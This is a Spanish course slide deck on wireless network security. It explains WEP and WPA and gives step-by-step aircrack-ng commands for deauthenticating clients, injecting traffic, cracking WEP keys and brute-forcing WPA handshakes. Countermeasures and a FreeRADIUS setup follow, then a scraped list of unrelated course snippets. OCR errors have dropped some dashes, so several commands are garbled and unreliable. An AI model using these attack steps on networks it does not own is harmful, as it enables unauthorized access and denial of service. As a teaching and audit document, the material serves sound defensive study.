97 A pesar de la flexibilidad y los beneficios de la tecnología inalámbrica, existen algunos riesgos y limitaciones. Utilizan rangos del espectro de radiofrecuencia (RF) sin costes de licencia por su transmisión y uso. Estos rangos al ser de uso público están saturados y las señales de distintos dispositivos suelen interferir entre sí. El área problemática de la tecnología inalámbrica es la seguridad. Permite a cualquier equipo con tarjeta de red inalámbrica interceptar cualquier comunicación de su entorno. Para tratar estas cuestiones de seguridad se han desarrollado técnicas para ayudar a proteger las transmisiones inalámbricas, por ejemplo la encriptación y la autenticación. A pesar de las siguientes técnicas que se presentan a continuación, y de los problemas propios asociados a las comunicaciones cableadas (fibra, cable de pares, coaxial) como las interferencias y deterioros o daños físicos del material, éstas siguen siendo los medios de acceso físico más seguros que existen en la actualidad. 97

98 Los sistemas de cifrado empleados para autenticación como encriptación en redes inalámbricas son: Sistema abierto u Open System: es decir sin autenticación en el control de acceso a la red, normalmente realizado por el punto de acceso, ni cifrado en las comunicaciones. WEP o Wired Equivalent Privacy o Privacidad Equivalente a Cableado: sistema estándar diseñado en la norma básica de redes inalámbricas Emplea un el algoritmo de cifrado RC4 para la confidencialidad, mientras que el CRC-32 proporciona la integridad En cuanto a la autenticación existen 2 métodos: Autenticación de Sistema Abierto: el cliente WLAN no se tiene que identificar en el Punto de Acceso durante la autenticación. Así, cualquier cliente, independientemente de su clave WEP, puede verificarse en el Punto de Acceso y luego intentar conectarse. En efecto, la no autenticación (en el sentido estricto del término) ocurre. Después de la autenticación y la asociación, el sistema WEP puede ser usado para cifrar los paquetes de datos. En este punto, el cliente tiene que tener las claves correctas. 98

99 Autenticación mediante Clave Compartida: WEP es usado para la autenticación. Este método se puede dividir en cuatro fases: I) La estación cliente envía una petición de autenticación al Punto de Acceso. II) El punto de acceso envía de vuelta un texto modelo. III) El cliente tiene que cifrar el texto modelo usando la clave WEP ya configurada, y reenviarlo al Punto de Acceso en otra petición de autenticación. IV) El Punto de Acceso descifra el texto codificado y lo compara con el texto modelo que había enviado. Dependiendo del éxito de esta comparación, el Punto de Acceso envía una confirmación o una denegación. Después de la autenticación y la asociación, WEP puede ser usado para cifrar los paquetes de datos. A primera vista podría parecer que la autenticación por Clave Compartida es más segura que la autenticación por Sistema Abierto, ya que éste no ofrece ninguna autenticación real. Sin embargo, es posible averiguar la clave WEP estática interceptando los cuatro paquetes de cada una de las fases de la autenticación con Clave Compartida. 99

100 WPA o Wi-Fi Protected Access o Acceso Protegido Wi-Fi: creado para corregir las deficiencias del sistema previo WEP. Se han realizado 2 publicaciones del estándar WPA como solución intermedia, y el definitivo WPA2 es la versión certificada del estándar de la IEEE bajo el estándar i. Se proponen 2 soluciones según el ámbito de aplicación: WPA Empresarial o WPA-Enterprise (grandes empresas): la autenticación es mediante el uso de un servidor RADIUS, donde se almacenan las credenciales y contraseñas de los usuarios de la red. WPA Personal (pequeñas empresas y hogar): la autenticación se realiza mediante clave precompartida, de un modo similar al WEP. 100

101 Una de las mejoras sobre WEP, es la implementación del Protocolo de Integridad de Clave Temporal (TKIP - Temporal Key Integrity Protocol), que cambia claves dinámicamente a medida que el sistema es utilizado. Cuando esto se combina con un vector de inicialización (IV) mucho más grande, evita los ataques de recuperación de clave (ataques estadísticos) a los que es susceptible WEP. Adicionalmente a la autenticación y cifrado, WPA también mejora la integridad de la información cifrada. La comprobación de redundancia cíclica (CRC - Cyclic Redundancy Check) utilizado en WEP es inseguro, ya que es posible alterar la información y actualizar la CRC del mensaje sin conocer la clave WEP. WPA implementa un código de integridad del mensaje (MIC - Message Integrity Code), también conocido como "Michael". Además, WPA incluye protección contra ataques de "repetición" (replay attacks), ya que incluye un contador de tramas. Aportando un mayor nivel de seguridad en el cifrado, es posible emplear el algoritmo de cifrado simétrico AES-Advanced Encryption Standard, más robusto y complejo que TKIP, aunque su implementación requiere de hardware más potente por lo que no se encuentra disponible en todos los dispositivos. Aunque WPA es indiscutiblemente el sistema más seguro, uno de los grandes problemas que se plantea es la compatibilidad y disponibilidad de las distintas versiones y algoritmos de cifrado del mismo. 101

102 Existen muchos programas que nos permiten romper la seguridad de una red inalámbrica. Sin duda alguna el más importante es aircrack-ng en su versión de Linux (aunque también existe su homólogo en Windows) y Cain de Windows. A continuación se va a utilizar aircrack-ng en Linux por ser la mejor forma de romper las redes inalámbricas. Aircrarck-ng ( es una colección de herramientas que permiten auditar y atacar redes inalámbricas. Las herramientas que incluye aircrack son las siguientes: airmon-ng. Permite poner la tarjeta inalámbrica en modo monitor (Sniffer). airodump-ng. Guarda los paquetes de la interfaz WLAN para procesarlos más tarde con aircrack-ng. aircrack-ng. Permite romper el protocolo WEP y WPA- PSK para conseguir la clave de encriptación. 102

103 aireplay-ng. Permite inyectar paquetes ARP-request en una red inalámbrica para generar tráfico y que sea más fácil romper la clave con aircrack-ng. airdecap-ng. Desencripta ficheros pcap encriptados con WEP/WPA. aircrack está disponible en muchas distribuciones live-cd (por ejempio, Back-Track) Para instalar aircrack-ng siga los siguientes pasos: Descargue el fichero aircrack-ng tar.gz de la página oficial de aircrack Descomprima el fichero utilizando tar xvfz aircrack-ng tar.gz cd aircrack-ng make make instail 103

104 Ataques WPA/PSK Airscript Ataques WEP Ataques a redes abiertas Detección de redes inalámbricas 104

105 a) Detección de redes inalámbricas: Para detectar las redes inalámbricas que hay en la zona hay que poner el adaptador de la red inalámbrica en modo monitor (igual que el modo promiscuo de una tarjeta de red) ejecutando el comando: airmon-ng start wlan0 Ahora escanee las redes disponibles ejecutando el comando: airodump-ng w datos wlan0 Donde wlan0 es la interfaz de red inalámbrica y w datos indica que guarde la salida en el fichero datos. 105

106 b) Ataques a redes abiertas: Si la red no utiliza encriptación, entonces es totalmente vulnerable ante posibles ataques ya que un atacante puede conectarse a la red, realizar ataques de denegaci6n de servicio, etc. Los ataques DoS (Deny of Service) permiten desautenticar a los clientes de una red para dejar inutilizada la red, falsear la identidad de un equipo, o simplemente forzar a que un cliente vuelva a autenticarse. La práctica más común es forzar a que un cliente vuelva a autenticarse y de esa forma proporcionar información útil para poder realizar un ataque WEP o WPA. A continuación se van a realizar dos ejempios senciilos de ataques de denegación de servicio: desautenticación broadcast y desautenticación de un cliente determinado. Para realizar un ataque de desautenticación de todos los clientes de una red debe ejecutar el siguiente comando: aireplay-ng a MAC_AP wlan0 donde -a MAC_AP especifica la dirección mac del punto de acceso que quiere atacar y wlan= es nuestra interfaz de red. Para desautenticar un solo cliente ejecute el comando: aireplay-ng a MAC_AP -c MAC_CLI wlan0 donde -c MAC_CLI especifica la dirección del cliente que quiere desautenticar. 106

107 c) Ataques WEP: El estándar Wifi del protocolo WEP está basado en el algoritmo RC4 con una clave secreta de 40 o 104 bits, combinado con un vector de inicialización (IV) de 24 bits. WEP no fue creado por expertos criptográficos y, desde prácticamente su aparición, han ido apareciendo numerosas vulnerabilidades ante los problemas que presenta el algoritmo RC4, ya que utiliza debilidades de no validación y ataques IV conocidos. Ambos ataques se basan en el hecho de que para ciertos valores de la clave es posible que los bytes iniciales del flujo de la clave dependan de tan sólo unos pocos bits de la clave de encriptación. Como la clave de encriptación esta compuesta por la clave secreta y los IV, ciertos valores de IV muestran claves débiles. Por lo tanto, si consigue suficientes IV débiles podrá obtener la clave WEP. Para obtener una clave WEP de 64 bits se necesitan unos IVs y para una clave de 128 bits unos IVs. 107

108 c) Ataques WEP: PASO1: El primer paso que debe realizar es poner la tarjeta de red en modo monitor: airmon-ng start wlan0 PASO2: Ejecute airodump-ng para que guarde los paquetes IV (necesarios para realizar el ataque): airodump-ng w datos wlan0 donde w datos indica el nombre del fichero donde se van a guardar los datos. 108

109 c) Ataques WEP: Tal y como puede ver en la figura, el punto de acceso que se quiere atacar (NETGEAR) trabaja en el canal (CH) 11. Para mejorar el ataque puede utilizar el parámetro -c 11 para que se registre únicamente los datos del AP. airodump-ng --ivs w datos -c 11 wlan0 109

110 c) Ataques WEP: PASO3: Ahora sólo falta acelerar el proceso de captura de IV, mediante el inyectado de tráfico desde el equipo del atacante. Para ello utilizará el cliente autentificado y asociado en el paso siguiente. Dejamos que capture un paquete ARP-request, para luego reinyectarlo en la red para que aumente drásticamente el número de paquetes IVs. aireplay-ng -3 -b MAC_AP h MAC_FALSO_CLIENTE x 600 wlan donde -3 indica el tipo de ataque, y -x 600 permite indicar la velocidad con la que reinyecta paquetes. 110

111 c) Ataques WEP: PASO4: Para poder inyectar paquetes va a autenticarse y asociarse con un cliente ficticio de la red. aireplay-ng e NETGEAR -a MAC_AP -h MAC_FALSO_CLIENTE wlan0 donde indica que va a enviar 10 paquetes de autenticación, -a MAC_AP indica la dirección mac del punto de acceso, y -h MAC_FALSO_CLIENTE indica una dirección mac falsa. PASO5: Ahora ya puede ejecutar en otra consola aircrack-ng para que vaya analizando los paquetes IVs obtenidos por airdump-ng y almacenados en el fichero datos-01. ivs. aircrack-ng -0 datos-01. ivs 111

112 c) Ataques WEP: El proceso puede durar unos 10 minutos para contraseñas WEP de 64 bits y unos 20 minutos para contraseñas WEP de 128 bits. Si quiere aceierar el proceso puede indicar la longitud de la contraseña WEP de la siguiente forma: aircrack-ng -o -n 64 datos-01.ivs donde -n 64 indica la longitud de la contraseña WEP. 112

113 c) Ataques WEP: Cuando finaliza aircrack-ng nos muestra en pantalla la contraseña: 113

114 d) Ataques WPA/PSK: El protocolo WPA/JPSK se basa en una autenticación por contraseña del cliente al punto de acceso. La información es cifrada con el algoritmo RC4 con una clave compartida de 128 bits y un vector de inicialización de 48 bits. Para obtener la contraseña WPA únicamente necesita un único paquete que contenga la autenticación del cliente al punto de acceso (handshake). Una vez obtenido el handshake se realiza de forma local un ataque de fuerza bruta para obtener la contraseña. Por lo tanto, la robustez de WPA reside en la complejidad de la contraseña. 114

115 d) Ataques WPA/PSK: PASO1: El primer paso que debe realizar es poner la tarjeta de red en modo monitor: airmon-ng start wlan0 PASO2: A continuación, detecte con airodump-ng los puntos de acceso WPA disponibles en la zona. airodump-ng -w datos wlan0 donde -w datos indica el nombre del fichero donde se van a guardar los datos. 115

116 d) Ataques WPA/PSK: PASO3: El punto de acceso que quiere atacar (NETGEAR) trabaja en el canal 11. Para mejorar el ataque puede indicarle a airodump-ng con el parámetro -c 11 que registre únicamente los datos del AP. airodump-ng -w salida c 11 wlan0 116

117 d) Ataques WPA/PSK: PASO4: Como puede ver en la figura anterior hay dos clientes conectados al punto de acceso a atacar. Para obtener el handshake debe des autenticar un cliente para forzar le a volver a conectarse al punto de acceso y así capturar la trama que no sinteresa. aireplay-ng -04 a MAC_AP c MAC_CLI wlan0-0 4 indica que se enviarán 4 tramas de desautenticación, -a MAC_AP indica el punto de acceso, -c MAC CLI indica el cliente y wlan0 la interfaz de la red inalámbrica. 117

118 d) Ataques WPA/PSK: PASO5: Para obtener la clave WPA-PSK debe realizar un ataque de fuerza bruta utilizando el siguiente comando: aircrack-ng a 2 w diccionario.txt salida-01.cap el parámetro -a 2 indica el tipo de ataque, -w diccionario.txt indica el diccionario que quiere utilizar para realizar ei ataque, y salida-01.cap es el fichero que contiene el handshake. Para este tipo de ataque es muy importante tener un buen diccionario. Para eso puede crearlo o descargarlo de Internet (por ejemplo, 118

119 e) Airoscript: Airoscript ( es un shell script de cortafuego GNU/Linux diseñado para interactuar con aircrack que permite romper las contraseñas WEP y WAP de una forma muy fácil. La utilización de Airoscript es muy sencilla. Tan sólo debe ejecutar una disponga consola el comando Airoscript y aparecerá el menú. Para romper una red inalámbrica tan sólo debe realizar los siguientes pasos: Pulse 1 para escanear las redes inalámbricas de la zona. Pulse 2 para seleccionar la red inalámbrica que desea atacar y, si lo desea, puede seleccionar un cliente que este conectado a la red. Seleccionar un cliente que se encuentre autenticado en la red es muy útil en el caso de que la red utilice filtrado de direcciones MAC. Pulse 3 para iniciar el ataque a la red inalámbrica. Y finalmente, pulse 4 para que Aircrack utilice los datos obtenidos en el paso anterior para obtener la contraseña de la red atacada. 119

120 e) Airoscript: LIVE/CD Wifiway 120

121 e) Airoscript: LIVE/CD Wifislax 121

122 Contramedidas Un aspecto muy importante para asegurar una red inalámbrica es limitar sus servicios. No es lógico que un equipo que se encuentra desde una red inalámbrica tenga los mismos permisos que ei que se encuentra en la red cableada. Para asegurar la red, una medida primordial es separar la red inalámbrica de la cableada estableciendo diferentes permisos. Por ejemplo, puede configurar el cortafuegos para que desde la red inalámbrica sólo tenga acceso a páginas web. Otra medida de seguridad es utilizar cifrado seguro como es el caso de WPA2 y utilizar un servidor de autenticación radius que permite que cada usuario disponga de una contraseña diferente para acceder a la red inalámbrica; y no que todos tengan la misma. 122

123 Actualmente realizar auditorias wireless para medir el nivel de seguridad de nuestras redes inalámbricas es una práctica esencial como administrador. Existen multitud de aplicaciones que permiten monitorizar y recuperar contraseñas de redes inálámbricas (airodump, aircrack, etc.), así como distribuciones Live (Backtrack, Wifiway, Wifislax, etc.) que las incorporan y disponen de script o aplicaciones que automatizan el proceso de desencriptado de contraseñas. 1. Se presenta otro ejemplo para comprobar la vulnerabilidad de las claves WEP utilizando la distribución Live Wifiway 2.0 que contiene la aplicación Minidwepgtk que nos ayudará a desencriptar dicha clave. Con el sistema iniciado nos dirigimos al menú principal - wifiway - suite aircrack-ng - minidwep-gtk. Al abrir la aplicación nos aparecerá lo siguiente: En la columna de la izquierda tenemos una opción: "wireless cards en la que podemos seleccionar la tarjeta de red que deseemos en caso de tener 2 o más tarjetas instaladas en nuestra máquina. En la misma columna tenemos las opciones del canal "Channel". Podemos elegir en que canal queremos hacer el rastreo de redes inalámbricas. Encryption permite seleccionar el tipo de encriptación de las redes que se mostraran en la lista de redes. 123

124 2. A continuación realizaremos el escaneo con el botón "Scan", en la parte superior tendremos la lista de redes inalámbricas que capta nuestra tarjeta de red inalámbrica. En esta lista se especifica la dirección MAC del punto de acceso, su nombre, la potencia con que captamos la señal, el canal que usa para transmitir y el tipo de encriptación. 3. Una vez escaneadas las redes, seleccionaremos la red de la que queremos descifrar su contraseña y pulsaremos el botón "Launch Dependiendo de la calidad de la señal, la distancia al punto de acceso, el tráfico en la red inalámbrica por parte de otros equipos conectados y las características de nuestra tarjeta de red inalámbrica, tendremos que esperar ms o menos tiempo hasta que la aplicación recoja suficientes paquetes de información, en los que se incluyen vectores de inicialización o IVs, que les permitan descifrar la clave de dicha red. 4. La aplicación realizará de forma automática una serie de acciones para la recogida masiva de paquetes, en el caso de que todo vaya bien, nos mostrará una ventana que contiene un resumen de las acciones realizadas asi como la clave descifrada en código ASCII. 124

125 RADIUS (Remote Authentication Dial-In User Server) es un protocolo que nos permite gestionar la autenticación, autorización y registro de usuarios remotos sobre un determinado recurso. autenticación, autorización y registro es más conocida como AAA, al ser éste su acrónimo de su denominación original inglesa Authentication, Authorization, and Accounting. Es interesante el uso del protocolo RADIUS cuando tenemos redes de dimensiones considerables sobre las que queremos proporcionar un servicio de acceso centralizado (aunque posiblemente jerarquizado por medio de diversos servidores RADIUS). Por este motivo, uno de los principales usos de RADIUS se encuentra en empresas que proporcionan acceso a Internet o grandes redes corporativas, en un entorno con diversas de tecnologías de red no sólo para gestionar el acceso a la propia red, sino también para servicios propios de Internet (como , Web o incluso dentro del proceso de señalización SIP en VoIP). 125

126 Un uso de RADIUS que queremos enfatizar, al ser el que realizaremos en esta práctica, es la autenticación en redes inalámbricas (Wi-Fi), sustituyendo métodos más simples de clave compartida (pre-shared key, PSK), que son bastante limitados al gestionar una red cuando ésta alcanza un determinado tamaño. Aunque RADIUS es el protocolo para AAA más extendido en la actualidad, ya existe un nuevo protocolo que está llamado a sustituir a RADIUS. Su nombre es DIAMETER, y también proporciona manejo de errores y comunicación entre dominios. 126

127 1. La instalación del paquete se realiza mediante: aptitude install freeradius. Tras la instalación tendremos que configurar los usuarios que se autenticará en radius. Esta autenticación se realiza a través del fichero /etc/freeradius/users que contiene, en texto plano, los usuarios que tienen permitida la autenticación. Algunos usuarios se encuentran reconfigurados, podremos añadir las líneas de usuarios que deseemos. 2. Ahora tendremos que configurar los clientes, es decir, los puntos de acceso serán los clientes de nuestro servidor radius. Para introducir la información sobre los clientes (puntos de acceso que solicitarán la verificación de usuarios inalámbricos finales) en la configuración de Radius modificaremos el archivo /etc/freeradius/clients.conf donde introduciremos la información de las IP de los puntos de acceso que quieran emplear el servidor ( en nuestro caso), así como la contraseña entre punto de acceso y servidor (secret = clave_acceso), y el nombre de la red o SSID (shortname = SSID) 127

128 128

129 3. Reiniciamos el servidor Radius mediante la siguiente orden: service freeradius restart o /etc/init.d/freeradius restart 4. Configuramos el AP. Dependerá sw del punto de acceso pero en general tendremos la opción de Wireless Security, donde seleccionaremos la opción WPA2-Enterprise, cifrado TKIP+AES. 5. Por último, solo queda configurar en el usuario cliente final (tarjeta de red inalámbrica) la conexión al punto de acceso de manera que la autentificación pase a Radius. Para la configuración de un cliente Windows xp tendremos que buscar la red mediante el asistente de conexión inalámbrica de Windows. Si intentamos realizar una conexión con el punto de acceso, nos boqueará la conexión ya que detectará que hay un servidor de Radius en la red y el perfil de conexi6n del cliente no está configurado para autenticación en Radius. Para solucionar este problema entraremos en las propiedades del adaptador wireless y nos dirigimos a la secci6n "redes inalámbricas' y configuramos una nueva configuración o perfil para el SSID concreto. 129

130 En la configuración de la red, en la sección Asociación tenemos que seleccionar una autenticaci6n de red "WPA2" y el cifrado de datos "AES. Pulsamos el botón de Propiedades y deseleccionamos la opción que dice "validar un certificado del servidor". En el caso de querer dicha opción tendremos que habilitar uno en nuestro servidor en /etc/freeradius/certs. Pulsamos el botón "Configurar' y no activaremos la opción, para que el servidor Radius no acepte automáticamente el usuario y password de inicio de sesión en Windows. Tras esto, guardamos los cambios y nos volvemos a conectar al punto de acceso. Ahora nos pedirá el usuario y contraseña para poder autenticarnos en el servidor Radius. 130

131 Dado que el acceso a redes inalámbricas plantea un punto muy débil de seguridad en redes corporativas algunas recomendaciones para mejorar la seguridad son: Asegurar la administración del punto de acceso (AP), por ser un punto de control de las comunicaciones de todos los usuarios, y por tanto crítico en la red, cambiando la contraseña por defecto. Actualizar el firmware disponible del dispositivo para mejorar sus prestaciones, sobre todo de seguridad. Aumentar la seguridad de los datos transmitidos: usando encriptación WEP o WPA/WPA2 o servidor Radius, y cambiando las claves regularmente. Cambia el SSID por defecto y desactiva el broadcasting SSID. Los posibles intrusos tendrán que introducir manualmente el SSID y conocerlo previamente. Aunque la administración de los clientes se complica ya que deberán conocer el nombre exacto del SSID. Realizar una administración y monitorización minuciosa: Desactivar el servidor DHCP, y asignar manualmente en los equipos las direcciones IP. Cambiar las direcciones IP del punto de acceso y el rango de la red por defecto. Activar el filtrado de conexiones permitidas mediante direcciones MAC. Establecer un número máximo de dispositivos que pueden conectarse. Analizar peri6dicamente los usuarios conectados verificando si son autorizados o no. Desconexión del AP cuando no se use. Actualizar el firmware del dispositivo, para evitar vulnerabilidades o añadir nuevas funciones de seguridad. 131

132 Curso abierto con materiales y ejercicios sobre Seguridad Avanzada en Redes Sitio web sobre seguridad informática en materia de redes: Noticias sobre seguridad en redes. Asociación de internautas: Conexiones inalámbricas seguras y auditorías wireless en: Blog especializado en seguridad y redes

PRACTICA 6.1 Wireshark, NMAP Caín & Abel Caín & Abel

PRACTICA 6.1 Wireshark, NMAP Caín & Abel Caín & Abel PRACTICA 6.1 La monitorización del tráfico de red es un aspecto fundamental para analizar qué está sucediendo en la misma, y poder tomar precauciones y medidas de seguridad en la misma. Herramientas como

Más detalles

UD 3: Implantación de técnicas de seguridad remoto. Seguridad perimetral.

UD 3: Implantación de técnicas de seguridad remoto. Seguridad perimetral. UD 3: Implantación de técnicas de seguridad remoto. Seguridad perimetral. Redes privadas virtuales. VPN Beneficios y desventajas con respecto a las líneas dedicadas. En años pasados si una oficina remota

Más detalles

Seguridad Perimetral. Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012

Seguridad Perimetral. Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012 Seguridad Perimetral Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012 Introducción La mayoría de las empresas sufren la problemática de seguridad debido a sus necesidades

Más detalles

CONCLUSIONES 155 A través de cada uno de los capítulos del presente documento se han enumerado una serie herramientas de seguridad que forman parte del sistema de defensa de una red y que, controlan su

Más detalles

DIPLOMADO EN SEGURIDAD INFORMATICA

DIPLOMADO EN SEGURIDAD INFORMATICA DIPLOMADO EN SEGURIDAD INFORMATICA Modulo 9: Soporte Computacional Clase 9_3:Protocolos de comunicación y conectividad de arquitecturas multiplataforma. Director Programa: César Torres A Profesor : Claudio

Más detalles

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD Fecha última revisión: Diciembre 2010 Tareas Programadas TAREAS PROGRAMADAS... 3 LAS TAREAS PROGRAMADAS EN GOTELGEST.NET... 4 A) DAR DE ALTA UN USUARIO...

Más detalles

Semana 10: Fir Fir w e a w lls

Semana 10: Fir Fir w e a w lls Semana 10: Firewalls DMZ y VPN Aprendizajes esperados Contenidos: Zonas desmilitarizadas (DMZ) Redes privadas virtuales (VPN) Zonas desmilitarizadas En seguridad informática, una ZONA DESMILITARIZADA (DMZ,

Más detalles

VPN RED PRIVADA VIRTUAL INTEGRANTES: ALEXANDER BERNAL RAMIREZ CARLOS TRANCA JOSUE FLORES MIGUEL ANGEL VILLANUEVA

VPN RED PRIVADA VIRTUAL INTEGRANTES: ALEXANDER BERNAL RAMIREZ CARLOS TRANCA JOSUE FLORES MIGUEL ANGEL VILLANUEVA VPN RED PRIVADA VIRTUAL INTEGRANTES: ALEXANDER BERNAL RAMIREZ CARLOS TRANCA JOSUE FLORES MIGUEL ANGEL VILLANUEVA CONCEPTO VPN DEFINICIÓN, QUE SE PUEDE HACER CON UN VPN TIPOS DE VPN - ARQUITECTURA VPN ACCESO

Más detalles

Tecnologías De La Información Y Comunicación I. Firewall Y Proxy. Integrantes: Héctor Duran. Katherine Zumelzu

Tecnologías De La Información Y Comunicación I. Firewall Y Proxy. Integrantes: Héctor Duran. Katherine Zumelzu Firewall Y Proxy Integrantes: Héctor Duran Katherine Zumelzu Fecha: 15/04/2015 Índice Qué es un firewall?... 3 Tipos de Firewall... 4 -Nivel de aplicación de Pasarela:... 4 -Circuito a nivel de Pasarela:...

Más detalles

Redes de Área Local: Configuración de una VPN en Windows XP

Redes de Área Local: Configuración de una VPN en Windows XP Redes de Área Local: Configuración de una VPN en Windows XP Tatiana Echegoyen Blasco Facultad de Informática UPV - Curso 2005/2006 Índice 1. Qué es una VPN?...2 2. Cómo funciona una VPN?...2 3. Por qué

Más detalles

Seguridad de la información: ARP Spoofing

Seguridad de la información: ARP Spoofing ELO322 Redes de Computadores I Seguridad de la información: ARP Spoofing Nombres: Mauricio Muñoz Stephanie Salazar Paola Yang 1 Resumen El protocolo encargado de enviar cada paquete a su destino es el

Más detalles

LINEAMIENTOS DE ESQUEMAS DE SEGURIDAD DE LA INFORMACIÓN

LINEAMIENTOS DE ESQUEMAS DE SEGURIDAD DE LA INFORMACIÓN LINEAMIENTOS DE ESQUEMAS DE SEGURIDAD DE LA INFORMACIÓN 1 OBJETIVO Describir los lineamientos aplicados a la gestión y administración de los equipos de seguridad instalados en la salida a internet y en

Más detalles

CONFIGURACION DE SERVIDOR SSH EN REDHAT. Redhat para todos. Breve manual de configuración de servidor FTP en redhat

CONFIGURACION DE SERVIDOR SSH EN REDHAT. Redhat para todos. Breve manual de configuración de servidor FTP en redhat CONFIGURACION DE SERVIDOR SSH EN REDHAT Redhat para todos Breve manual de configuración de servidor FTP en redhat INTRODUCCION SERVIDOR SSH BASADO EN LINUX SSH (o Secure SHell) es un protocolo que facilita

Más detalles

Firewalls, IPtables y Netfilter

Firewalls, IPtables y Netfilter Firewalls, IPtables y Netfilter Dastugue, Juan Cristobal, Leandro Temario Políticas de diseño de un Firewall Definición Qué es un Firewall? Es un sistema o conjunto de sistemas, ubicado entre dos redes.

Más detalles

Escritorio remoto y VPN. Cómo conectarse desde Windows 7

Escritorio remoto y VPN. Cómo conectarse desde Windows 7 Escritorio remoto y VPN. Cómo conectarse desde Windows 7 Hay ocasiones en las que es necesario conectarnos a un equipo informático situado a mucha distancia de donde nos encontramos para realizar sobre

Más detalles

Firewall Firestarter. Establece perímetros confiables.

Firewall Firestarter. Establece perímetros confiables. Firewall Firestarter Qué es un Firewall? Un muro de fuego (firewall en inglés) es una parte de un sistema o una red que está diseñada para bloquear el acceso no autorizado, permitiendo al mismo tiempo

Más detalles

Para entornos con más de un equipo conectados en red es necesario que el programa de firewall conceda paso a los servicios de Microsoft SQL Server.

Para entornos con más de un equipo conectados en red es necesario que el programa de firewall conceda paso a los servicios de Microsoft SQL Server. ET-SEGURIDAD SQL INSTRUCCIONES DE USO IMPORTANTE Este software puede ser bloqueado por software antivirus. Asegúrese de añadir la excepción correspondiente si fuese necesario. Se recomienda deshabilitar

Más detalles

PROYECTO. Solución Empresarial Ingeniería y Desarrollo de Software www.solucionempresarial.com.ar - info@solucionempresarial.com.

PROYECTO. Solución Empresarial Ingeniería y Desarrollo de Software www.solucionempresarial.com.ar - info@solucionempresarial.com. PROYECTO 1 ÍNDICE 1. Presentación 2. Que es OpenVPN 3. Uso de las VPN s 4. Implementación 5. Seguridad 6. Ventajas 6. Requisitos 7. Objetivos 8. Presupuesto 2 Presentación Es una solución multiplataforma

Más detalles

Dispositivos de Red Hub Switch

Dispositivos de Red Hub Switch Dispositivos de Red Tarjeta de red Para lograr el enlace entre las computadoras y los medios de transmisión (cables de red o medios físicos para redes alámbricas e infrarrojos o radiofrecuencias para redes

Más detalles

Acronis License Server. Guía del usuario

Acronis License Server. Guía del usuario Acronis License Server Guía del usuario TABLA DE CONTENIDO 1. INTRODUCCIÓN... 3 1.1 Generalidades... 3 1.2 Política de licencias... 3 2. SISTEMAS OPERATIVOS COMPATIBLES... 4 3. INSTALACIÓN DE ACRONIS LICENSE

Más detalles

SSH MANUAL BÁSICO. AUTORES Karen Giraldo Escobar Julián Andrés Lozano. 3/10/2010 Universidad ICESI

SSH MANUAL BÁSICO. AUTORES Karen Giraldo Escobar Julián Andrés Lozano. 3/10/2010 Universidad ICESI SSH MANUAL BÁSICO AUTORES Karen Giraldo Escobar Julián Andrés Lozano 3/10/2010 Universidad ICESI TABLA DE CONTENIDO 1. INTRODUCCIÓN... 3 1.1. Que es SSH?... 3 1.2. Características de SSH 3 1.3. Por qué

Más detalles

Ayuda de Symantec pcanywhere Web Remote

Ayuda de Symantec pcanywhere Web Remote Ayuda de Symantec pcanywhere Web Remote Conexión desde un navegador web Este documento incluye los temas siguientes: Acerca de Symantec pcanywhere Web Remote Protección de la sesión de Web Remote Formas

Más detalles

Guía de Instalación para clientes de WebAdmin

Guía de Instalación para clientes de WebAdmin Panda Managed Office Protection Guía de Instalación para clientes de WebAdmin Tabla de contenidos 1. Introducción... 4 2. Instalación de Panda Managed Office Protection a partir de una instalación de Panda

Más detalles

MANUAL COPIAS DE SEGURIDAD

MANUAL COPIAS DE SEGURIDAD MANUAL COPIAS DE SEGURIDAD Índice de contenido Ventajas del nuevo sistema de copia de seguridad...2 Actualización de la configuración...2 Pantalla de configuración...3 Configuración de las rutas...4 Carpeta

Más detalles

HOWTO: Cómo configurar SNAT

HOWTO: Cómo configurar SNAT HOWTO: Cómo configurar SNAT Casos de uso para configurar SNAT con GateDefender Integra Panda Security desea que obtenga el máximo beneficio de sus unidades GateDefender Integra. Para ello, le ofrece la

Más detalles

Introducción a la Firma Electrónica en MIDAS

Introducción a la Firma Electrónica en MIDAS Introducción a la Firma Electrónica en MIDAS Firma Digital Introducción. El Módulo para la Integración de Documentos y Acceso a los Sistemas(MIDAS) emplea la firma digital como método de aseguramiento

Más detalles

Preguntas y respuestas sobre el cifrado de la información personal. La guía para aprender a cifrar tu información

Preguntas y respuestas sobre el cifrado de la información personal. La guía para aprender a cifrar tu información Guía de Cifrado Preguntas y respuestas sobre el cifrado de la información personal La guía para aprender a cifrar tu información 2 Qué es lo que estamos cuidando? A través del cifrado cuidamos de fotos,

Más detalles

Capítulo 5. Cliente-Servidor.

Capítulo 5. Cliente-Servidor. Capítulo 5. Cliente-Servidor. 5.1 Introducción En este capítulo hablaremos acerca de la arquitectura Cliente-Servidor, ya que para nuestra aplicación utilizamos ésta arquitectura al convertir en un servidor

Más detalles

Guía de Inicio Respaldo Cloud

Guía de Inicio Respaldo Cloud Guía de Inicio Respaldo Cloud Calle San Rafael, 14 28108 Alcobendas (Madrid) 900 103 293 www.acens.com Contenido 1 Introducción... 3 2 Características Respaldo Cloud... 4 3 Acceso y activación... 5 - Gestión

Más detalles

Como crear una red privada virtual (VPN) en Windows XP

Como crear una red privada virtual (VPN) en Windows XP Como crear una red privada virtual (VPN) en Windows XP Introducción Cada vez es más habitual moverse en escenarios en donde se requiere el acceso a recursos remotos desde cualquier lugar, incluso recursos

Más detalles

Instalar protocolo, cliente o servicio nuevo. Seleccionar ubicación de red. Práctica - Compartir y conectar una carpeta

Instalar protocolo, cliente o servicio nuevo. Seleccionar ubicación de red. Práctica - Compartir y conectar una carpeta Configuración de una red con Windows Aunque existen múltiples sistemas operativos, el más utilizado en todo el mundo sigue siendo Windows de Microsoft. Por este motivo, vamos a aprender los pasos para

Más detalles

ATAQUE Y CONTRAMEDIAS

